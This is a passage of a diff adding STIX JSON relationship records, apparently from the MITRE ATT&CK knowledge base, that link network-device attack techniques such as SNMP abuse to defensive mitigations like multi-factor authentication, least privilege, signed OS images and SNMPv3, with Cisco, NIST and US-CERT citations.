"attack-pattern--4ffc1794-ec3b-45be-9e52-42dbcb2af2de", + "relationship_type": "mitigates", + "description": "Restrict administrator accounts to as few individuals as possible, following least privilege principles. Prevent credential overlap across systems of administrator and privileged accounts, particularly between network and non-network platforms, such as servers or endpoints.", + "id": "relationship--cef47b7b-6ecb-458b-8224-d797223a4689", + "type": "relationship", + "modified": "2020-10-21T01:45:59.197Z", + "created": "2020-10-19T16:48:08.538Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "attack-pattern--4ffc1794-ec3b-45be-9e52-42dbcb2af2de", + "target_ref": "attack-pattern--b8017880-4b1e-42de-ad10-ae7ac6705166", + "relationship_type": "subtechnique-of", + "id": "relationship--c2f85446-52ef-4446-a5e4-5a6b691156ec", + "type": "relationship", + "modified": "2020-10-19T16:48:08.551Z", + "created": "2020-10-19T16:48:08.551Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--b045d015-6bed-4490-bd38-56b41ece59a0", + "target_ref": "attack-pattern--fa44a152-ac48-441e-a524-dd7b04b8adcd", + "relationship_type": "mitigates", + "description": "Use multi-factor authentication for user and privileged accounts. Most embedded network devices support TACACS+ and/or RADIUS. Follow vendor prescribed best practices for hardening access control. (Citation: Cisco IOS Software Integrity Assurance - TACACS)", + "id": "relationship--fa8d6c79-557f-44e1-a27b-55f87b2c8084", + "external_references": [ + { + "source_name": "Cisco IOS Software Integrity Assurance - TACACS", + "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#39", + "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - TACACS. Retrieved October 19, 2020." + } + ], + "type": "relationship", + "modified": "2020-10-21T02:41:11.618Z", + "created": "2020-10-19T17:58:04.228Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--9bb9e696-bff8-4ae1-9454-961fc7d91d5f", + "target_ref": "attack-pattern--fa44a152-ac48-441e-a524-dd7b04b8adcd", + "relationship_type": "mitigates", + "description": "Restrict administrator accounts to as few individuals as possible, following least privilege principles. Prevent credential overlap across systems of administrator and privileged accounts, particularly between network and non-network platforms, such as servers or endpoints.", + "id": "relationship--bb1aff02-36e4-402e-9bd0-23bfd588e4ab", + "type": "relationship", + "modified": "2020-10-21T02:41:11.650Z", + "created": "2020-10-19T17:58:04.355Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "attack-pattern--fa44a152-ac48-441e-a524-dd7b04b8adcd", + "target_ref": "attack-pattern--f4c1826f-a322-41cd-9557-562100848c84", + "relationship_type": "subtechnique-of", + "id": "relationship--09bb741d-4f8b-4ae5-95f7-38d85e4d825a", + "type": "relationship", + "modified": "2020-10-19T17:58:04.374Z", + "created": "2020-10-19T17:58:04.374Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "attack-pattern--3a40f208-a9c1-4efa-a598-4003c3681fb8", + "target_ref": "attack-pattern--1f9012ef-1e10-4e48-915e-e03563435fe8", + "relationship_type": "subtechnique-of", + "id": "relationship--10ee09db-e80d-4022-8810-7bba70b33609", + "type": "relationship", + "modified": "2020-10-19T19:03:52.121Z", + "created": "2020-10-19T19:03:52.121Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "attack-pattern--7efba77e-3bc4-4ca5-8292-d8201dcd64b5", + "target_ref": "attack-pattern--1f9012ef-1e10-4e48-915e-e03563435fe8", + "relationship_type": "subtechnique-of", + "id": "relationship--2f21c707-0fb8-4f7f-9469-1e16c2b3c9b6", + "type": "relationship", + "modified": "2020-10-19T19:13:59.737Z", + "created": "2020-10-19T19:13:59.737Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--b045d015-6bed-4490-bd38-56b41ece59a0", + "target_ref": "attack-pattern--ae7f3575-0a5e-427e-991b-fe03ad44c754", + "relationship_type": "mitigates", + "description": "Use multi-factor authentication for user and privileged accounts. Most embedded network devices support TACACS+ and/or RADIUS. Follow vendor prescribed best practices for hardening access control.(Citation: Cisco IOS Software Integrity Assurance - TACACS)", + "id": "relationship--441e6528-4342-4387-848b-febb051e05f7", + "external_references": [ + { + "source_name": "Cisco IOS Software Integrity Assurance - TACACS", + "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#39", + "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - TACACS. Retrieved October 19, 2020." + } + ], + "type": "relationship", + "modified": "2020-10-22T16:54:58.939Z", + "created": "2020-10-19T19:42:19.805Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--49c06d54-9002-491d-9147-8efb537fbd26", + "target_ref": "attack-pattern--ae7f3575-0a5e-427e-991b-fe03ad44c754", + "relationship_type": "mitigates", + "description": "Some embedded network devices are capable of storing passwords for local accounts in either plain-text or encrypted formats. Ensure that, where available, local passwords are always encrypted, per vendor recommendations. (Citation: Cisco IOS Software Integrity Assurance - Credentials Management)", + "id": "relationship--a53cd21b-273f-43cf-a7e1-375aee6b66e9", + "external_references": [ + { + "source_name": "Cisco IOS Software Integrity Assurance - Credentials Management", + "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#40", + "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Credentials Management. Retrieved October 19, 2020." + } + ], + "type": "relationship", + "modified": "2020-10-22T16:54:59.229Z", + "created": "2020-10-19T19:42:19.844Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--90c218c3-fbf8-4830-98a7-e8cfb7eaa485", + "target_ref": "attack-pattern--ae7f3575-0a5e-427e-991b-fe03ad44c754", + "relationship_type": "mitigates", + "description": "Refer to NIST guidelines when creating password policies. (Citation: NIST 800-63-3)", + "id": "relationship--88997806-0c0f-47a7-b381-0ddd24f81f67", + "external_references": [ + { + "source_name": "NIST 800-63-3", + "url": "https://pages.nist.gov/800-63-3/sp800-63b.html", + "description": "Grassi, P., et al. (2017, December 1). SP 800-63-3, Digital Identity Guidelines. Retrieved January 16, 2019." + } + ], + "type": "relationship", + "modified": "2020-10-22T16:54:59.048Z", + "created": "2020-10-19T19:42:19.879Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--9bb9e696-bff8-4ae1-9454-961fc7d91d5f", + "target_ref": "attack-pattern--ae7f3575-0a5e-427e-991b-fe03ad44c754", + "relationship_type": "mitigates", + "description": "Restrict administrator accounts to as few individuals as possible, following least privilege principles. Prevent credential overlap across systems of administrator and privileged accounts, particularly between network and non-network platforms, such as servers or endpoints.", + "id": "relationship--de4ce747-488a-4def-8ede-8a3d371c9dd4", + "type": "relationship", + "modified": "2020-10-22T16:54:59.154Z", + "created": "2020-10-19T19:42:19.915Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--7da0387c-ba92-4553-b291-b636ee42b2eb", + "target_ref": "attack-pattern--ae7f3575-0a5e-427e-991b-fe03ad44c754", + "relationship_type": "mitigates", + "description": "Some vendors of embedded network devices provide cryptographic signing to ensure the integrity of operating system images at boot time. Implement where available, following vendor guidelines. (Citation: Cisco IOS Software Integrity Assurance - Secure Boot)", + "id": "relationship--bd4686bf-27fb-44b7-8546-be8b57c99fcd", + "external_references": [ + { + "source_name": "Cisco IOS Software Integrity Assurance - Secure Boot", + "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#35", + "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Secure Boot. Retrieved October 19, 2020." + } + ], + "type": "relationship", + "modified": "2020-10-22T16:54:59.260Z", + "created": "2020-10-19T19:42:19.932Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--590777b3-b475-4c7c-aaf8-f4a73b140312", + "target_ref": "attack-pattern--ae7f3575-0a5e-427e-991b-fe03ad44c754", + "relationship_type": "mitigates", + "description": "Many vendors provide digitally signed operating system images to validate the integrity of the software used on their platform. Make use of this feature where possible in order to prevent and/or detect attempts by adversaries to compromise the system image. (Citation: Cisco IOS Software Integrity Assurance - Deploy Signed IOS)", + "id": "relationship--ae16d5d7-9a6f-4865-863a-2ce336b45795", + "external_references": [ + { + "source_name": "Cisco IOS Software Integrity Assurance - Deploy Signed IOS", + "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#34", + "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Deploy Signed IOS. Retrieved October 21, 2020." + } + ], + "type": "relationship", + "modified": "2020-10-22T16:58:38.939Z", + "created": "2020-10-19T19:42:19.956Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--b045d015-6bed-4490-bd38-56b41ece59a0", + "target_ref": "attack-pattern--d245808a-7086-4310-984a-a84aaaa43f8f", + "relationship_type": "mitigates", + "description": "Use multi-factor authentication for user and privileged accounts. Most embedded network devices support TACACS+ and/or RADIUS. Follow vendor prescribed best practices for hardening access control.(Citation: Cisco IOS Software Integrity Assurance - TACACS)", + "id": "relationship--f1d0e2ed-3d68-4606-8a1c-3a78f9b55afe", + "external_references": [ + { + "source_name": "Cisco IOS Software Integrity Assurance - TACACS", + "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#39", + "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - TACACS. Retrieved October 19, 2020." + } + ], + "type": "relationship", + "modified": "2020-10-22T17:50:47.049Z", + "created": "2020-10-19T19:49:24.279Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--49c06d54-9002-491d-9147-8efb537fbd26", + "target_ref": "attack-pattern--d245808a-7086-4310-984a-a84aaaa43f8f", + "relationship_type": "mitigates", + "description": "Some embedded network devices are capable of storing passwords for local accounts in either plain-text or encrypted formats. Ensure that, where available, local passwords are always encrypted, per vendor recommendations. (Citation: Cisco IOS Software Integrity Assurance - Credentials Management)", + "id": "relationship--7349c449-f6cd-44cd-858d-93c29320d7f0", + "external_references": [ + { + "source_name": "Cisco IOS Software Integrity Assurance - Credentials Management", + "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#40", + "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Credentials Management. Retrieved October 19, 2020." + } + ], + "type": "relationship", + "modified": "2020-10-22T17:50:47.169Z", + "created": "2020-10-19T19:49:24.331Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--90c218c3-fbf8-4830-98a7-e8cfb7eaa485", + "target_ref": "attack-pattern--d245808a-7086-4310-984a-a84aaaa43f8f", + "relationship_type": "mitigates", + "description": "Refer to NIST guidelines when creating password policies. (Citation: NIST 800-63-3)", + "id": "relationship--fef0f7bc-5af4-4a5c-bd73-5892badf8707", + "external_references": [ + { + "source_name": "NIST 800-63-3", + "url": "https://pages.nist.gov/800-63-3/sp800-63b.html", + "description": "Grassi, P., et al. (2017, December 1). SP 800-63-3, Digital Identity Guidelines. Retrieved January 16, 2019." + } + ], + "type": "relationship", + "modified": "2020-10-22T17:50:47.450Z", + "created": "2020-10-19T19:49:24.380Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--9bb9e696-bff8-4ae1-9454-961fc7d91d5f", + "target_ref": "attack-pattern--d245808a-7086-4310-984a-a84aaaa43f8f", + "relationship_type": "mitigates", + "description": "Restrict administrator accounts to as few individuals as possible, following least privilege principles. Prevent credential overlap across systems of administrator and privileged accounts, particularly between network and non-network platforms, such as servers or endpoints.", + "id": "relationship--a4c24712-a5cf-4c44-91cd-057dc0a85e0f", + "type": "relationship", + "modified": "2020-10-22T17:50:47.281Z", + "created": "2020-10-19T19:49:24.415Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--7da0387c-ba92-4553-b291-b636ee42b2eb", + "target_ref": "attack-pattern--d245808a-7086-4310-984a-a84aaaa43f8f", + "relationship_type": "mitigates", + "description": "Some vendors of embedded network devices provide cryptographic signing to ensure the integrity of operating system images at boot time. Implement where available, following vendor guidelines. (Citation: Cisco IOS Software Integrity Assurance - Secure Boot)", + "id": "relationship--42703ec8-4dd6-42a3-b2bb-f2a135f89863", + "external_references": [ + { + "source_name": "Cisco IOS Software Integrity Assurance - Secure Boot", + "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#35", + "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Secure Boot. Retrieved October 19, 2020." + } + ], + "type": "relationship", + "modified": "2020-10-22T17:50:47.393Z", + "created": "2020-10-19T19:49:24.436Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--590777b3-b475-4c7c-aaf8-f4a73b140312", + "target_ref": "attack-pattern--d245808a-7086-4310-984a-a84aaaa43f8f", + "relationship_type": "mitigates", + "description": "Many vendors provide digitally signed operating system images to validate the integrity of the software used on their platform. Make use of this feature where possible in order to prevent and/or detect attempts by adversaries to compromise the system image. (Citation: Cisco IOS Software Integrity Assurance - Deploy Signed IOS)", + "id": "relationship--731ba292-7016-4ccf-a296-58ced0421a37", + "external_references": [ + { + "source_name": "Cisco IOS Software Integrity Assurance - Deploy Signed IOS", + "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#34", + "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Deploy Signed IOS. Retrieved October 21, 2020." + } + ], + "type": "relationship", + "modified": "2020-10-22T17:50:47.507Z", + "created": "2020-10-19T19:49:24.464Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "attack-pattern--d245808a-7086-4310-984a-a84aaaa43f8f", + "target_ref": "attack-pattern--ae7f3575-0a5e-427e-991b-fe03ad44c754", + "relationship_type": "subtechnique-of", + "id": "relationship--fca5a1c7-8548-4621-97b5-023572344ae4", + "type": "relationship", + "modified": "2020-10-19T19:49:24.478Z", + "created": "2020-10-19T19:49:24.478Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--b045d015-6bed-4490-bd38-56b41ece59a0", + "target_ref": "attack-pattern--fc74ba38-dc98-461f-8611-b3dbf9978e3d", + "relationship_type": "mitigates", + "description": "Use multi-factor authentication for user and privileged accounts. Most embedded network devices support TACACS+ and/or RADIUS. Follow vendor prescribed best practices for hardening access control.(Citation: Cisco IOS Software Integrity Assurance - TACACS)", + "id": "relationship--6e32fdd0-c094-405e-8246-7502c9aedb68", + "external_references": [ + { + "source_name": "Cisco IOS Software Integrity Assurance - TACACS", + "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#39", + "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - TACACS. Retrieved October 19, 2020." + } + ], + "type": "relationship", + "modified": "2020-10-22T17:49:03.063Z", + "created": "2020-10-19T19:53:10.650Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--49c06d54-9002-491d-9147-8efb537fbd26", + "target_ref": "attack-pattern--fc74ba38-dc98-461f-8611-b3dbf9978e3d", + "relationship_type": "mitigates", + "description": "Some embedded network devices are capable of storing passwords for local accounts in either plain-text or encrypted formats. Ensure that, where available, local passwords are always encrypted, per vendor recommendations. (Citation: Cisco IOS Software Integrity Assurance - Credentials Management)", + "id": "relationship--9cdefbe1-60ce-42b6-908d-1a630e78389c", + "external_references": [ + { + "source_name": "Cisco IOS Software Integrity Assurance - Credentials Management", + "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#40", + "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Credentials Management. Retrieved October 19, 2020." + } + ], + "type": "relationship", + "modified": "2020-10-22T17:49:03.085Z", + "created": "2020-10-19T19:53:10.711Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--90c218c3-fbf8-4830-98a7-e8cfb7eaa485", + "target_ref": "attack-pattern--fc74ba38-dc98-461f-8611-b3dbf9978e3d", + "relationship_type": "mitigates", + "description": "Refer to NIST guidelines when creating password policies. (Citation: NIST 800-63-3)", + "id": "relationship--dc9ff40d-a9c6-4042-b4f5-922ca7a64536", + "external_references": [ + { + "source_name": "NIST 800-63-3", + "url": "https://pages.nist.gov/800-63-3/sp800-63b.html", + "description": "Grassi, P., et al. (2017, December 1). SP 800-63-3, Digital Identity Guidelines. Retrieved January 16, 2019." + } + ], + "type": "relationship", + "modified": "2020-10-22T17:49:03.093Z", + "created": "2020-10-19T19:53:10.755Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--9bb9e696-bff8-4ae1-9454-961fc7d91d5f", + "target_ref": "attack-pattern--fc74ba38-dc98-461f-8611-b3dbf9978e3d", + "relationship_type": "mitigates", + "description": "Restrict administrator accounts to as few individuals as possible, following least privilege principles. Prevent credential overlap across systems of administrator and privileged accounts, particularly between network and non-network platforms, such as servers or endpoints.", + "id": "relationship--b099746f-3c9f-41e8-95b2-af6ee5c10e83", + "type": "relationship", + "modified": "2020-10-22T17:49:03.201Z", + "created": "2020-10-19T19:53:10.775Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--7da0387c-ba92-4553-b291-b636ee42b2eb", + "target_ref": "attack-pattern--fc74ba38-dc98-461f-8611-b3dbf9978e3d", + "relationship_type": "mitigates", + "description": "Some vendors of embedded network devices provide cryptographic signing to ensure the integrity of operating system images at boot time. Implement where available, following vendor guidelines. (Citation: Cisco IOS Software Integrity Assurance - Secure Boot)", + "id": "relationship--e8906be8-db8f-4ad3-829a-ca5eb4711584", + "external_references": [ + { + "source_name": "Cisco IOS Software Integrity Assurance - Secure Boot", + "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#35", + "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Secure Boot. Retrieved October 19, 2020." + } + ], + "type": "relationship", + "modified": "2020-10-22T17:49:03.220Z", + "created": "2020-10-19T19:53:10.796Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--590777b3-b475-4c7c-aaf8-f4a73b140312", + "target_ref": "attack-pattern--fc74ba38-dc98-461f-8611-b3dbf9978e3d", + "relationship_type": "mitigates", + "description": "Many vendors provide digitally signed operating system images to validate the integrity of the software used on their platform. Make use of this feature where possible in order to prevent and/or detect attempts by adversaries to compromise the system image. (Citation: Cisco IOS Software Integrity Assurance - Deploy Signed IOS)", + "id": "relationship--775f9337-6cab-49f6-850e-af3038f0c806", + "external_references": [ + { + "source_name": "Cisco IOS Software Integrity Assurance - Deploy Signed IOS", + "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#34", + "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Deploy Signed IOS. Retrieved October 21, 2020." + } + ], + "type": "relationship", + "modified": "2020-10-22T17:49:03.336Z", + "created": "2020-10-19T19:53:10.828Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "attack-pattern--fc74ba38-dc98-461f-8611-b3dbf9978e3d", + "target_ref": "attack-pattern--ae7f3575-0a5e-427e-991b-fe03ad44c754", + "relationship_type": "subtechnique-of", + "id": "relationship--f7a11ad8-80ac-4b0e-8749-102958f57f62", + "type": "relationship", + "modified": "2020-10-19T19:53:10.862Z", + "created": "2020-10-19T19:53:10.862Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--12241367-a8b7-49b4-b86e-2236901ba50c", + "target_ref": "attack-pattern--0ad7bc5c-235a-4048-944b-3b286676cb74", + "relationship_type": "mitigates", + "description": "Configure intrusion prevention devices to detect SNMP queries and commands from unauthorized sources.(Citation: US-CERT-TA18-106A)", + "id": "relationship--c217ea78-f411-4dd1-a019-8aa3e366df23", + "external_references": [ + { + "source_name": "US-CERT-TA18-106A", + "url": "https://www.us-cert.gov/ncas/alerts/TA18-106A", + "description": "US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020." + } + ], + "type": "relationship", + "modified": "2020-10-22T02:26:44.740Z", + "created": "2020-10-19T23:49:08.580Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--feff9142-e8c2-46f4-842b-bd6fb3d41157", + "target_ref": "attack-pattern--0ad7bc5c-235a-4048-944b-3b286676cb74", + "relationship_type": "mitigates", + "description": "Configure SNMPv3 to use the highest level of security (authPriv) available.(Citation: US-CERT TA17-156A SNMP Abuse 2017)", + "id": "relationship--cee1cfd6-0906-4b52-a8b4-d0d585632b81", + "external_references": [ + { + "source_name": "US-CERT TA17-156A SNMP Abuse 2017", + "url": "https://us-cert.cisa.gov/ncas/alerts/TA17-156A", + "description": "US-CERT. (2017, June 5). Reducing the Risk of SNMP Abuse. Retrieved October 19, 2020." + } + ], + "type": "relationship", + "modified": "2020-10-22T02:26:44.780Z", + "created": "2020-10-19T23:49:08.607Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--b5dbb4c5-b0b1-40b1-80b6-e9e84ab90067", + "target_ref": "attack-pattern--0ad7bc5c-235a-4048-944b-3b286676cb74", + "relationship_type": "mitigates", + "description": "Allowlist MIB objects and implement SNMP views.(Citation: Cisco Securing SNMP)", + "id": "relationship--872ba9c6-8e0d-48af-864b-de83b906baf1", + "external_references": [ + { + "source_name": "Cisco Securing SNMP", + "url": "https://www.cisco.com/c/en/us/support/docs/ip/simple-network-management-protocol-snmp/20370-snmpsecurity-20370.html", + "description": "Cisco. (2006, May 10). Securing Simple Network Management Protocol. Retrieved October 19, 2020." + } + ], + "type": "relationship", + "modified": "2020-10-22T02:26:44.782Z", + "created": "2020-10-19T23:49:08.631Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--e5d930e9-775a-40ad-9bdb-b941d8dfe86b", + "target_ref": "attack-pattern--0ad7bc5c-235a-4048-944b-3b286676cb74", + "relationship_type": "mitigates", + "description": "Keep system images and software updated and migrate to SNMPv3.(Citation: Cisco Blog Legacy Device Attacks)", + "id": "relationship--44930e59-94ae-40ff-bf9e-da00553620af", + "external_references": [ + { + "source_name": "Cisco Blog Legacy Device Attacks", + "url": "https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954", + "description": "Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020." + } + ], + "type": "relationship", + "modified": "2020-10-22T02:26:44.778Z", + "created": "2020-10-19T23:49:08.641Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--20f6a9df-37c4-4e20-9e47-025983b1b39d", + "target_ref": "attack-pattern--0ad7bc5c-235a-4048-944b-3b286676cb74", + "relationship_type": "mitigates", + "description": "Apply extended ACLs to block unauthorized protocols outside the trusted network.(Citation: US-CERT TA17-156A SNMP Abuse 2017)", + "id": "relationship--a78cac98-60e1-406a-8486-fcaf04a644e3", + "external_references": [ + { + "source_name": "US-CERT TA17-156A SNMP Abuse 2017", + "url": "https://us-cert.cisa.gov/ncas/alerts/TA17-156A", + "description": "US-CERT. (2017, June 5). Reducing the Risk of SNMP Abuse. Retrieved October 19, 2020." + } + ], + "type": "relationship", + "modified": "2020-10-22T02:26:44.820Z", + "created": "2020-10-19T23:49:08.663Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--86598de0-b347-4928-9eb0-0acbfc21908c", + "target_ref": "attack-pattern--0ad7bc5c-235a-4048-944b-3b286676cb74", + "relationship_type": "mitigates", + "description": "Segregate SNMP traffic on a separate management network.(Citation: US-CERT TA17-156A SNMP Abuse 2017)", + "id": "relationship--a538a888-c4a1-49a7-b343-eb85ab6d665f", + "external_references": [ + { + "source_name": "US-CERT TA17-156A SNMP Abuse 2017", + "url": "https://us-cert.cisa.gov/ncas/alerts/TA17-156A", + "description": "US-CERT. (2017, June 5). Reducing the Risk of SNMP Abuse. Retrieved October 19, 2020." + } + ], + "type": "relationship", + "modified": "2020-10-22T02:26:44.776Z", + "created": "2020-10-19T23:49:08.670Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "attack-pattern--ee7ff928-801c-4f34-8a99-3df965e581a5", + "target_ref": "attack-pattern--0ad7bc5c-235a-4048-944b-3b286676cb74", + "relationship_type": "subtechnique-of", + "id": "relationship--97d152a1-4cbd-4088-b23e-99354a730e47", + "type": "relationship", + "modified": "2020-10-19T23:51:06.043Z", + "created": "2020-10-19T23:51:06.043Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--12241367-a8b7-49b4-b86e-2236901ba50c", + "target_ref": "attack-pattern--ee7ff928-801c-4f34-8a99-3df965e581a5", + "relationship_type": "mitigates", + "description": "Configure intrusion prevention devices to detect SNMP queries and commands from unauthorized sources.(Citation: US-CERT-TA18-106A)", + "id": "relationship--95d846ca-5705-4a69-9d76-7d886ce86cec", + "external_references": [ + { + "source_name": "US-CERT-TA18-106A", + "url": "https://www.us-cert.gov/ncas/alerts/TA18-106A", + "description": "US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure 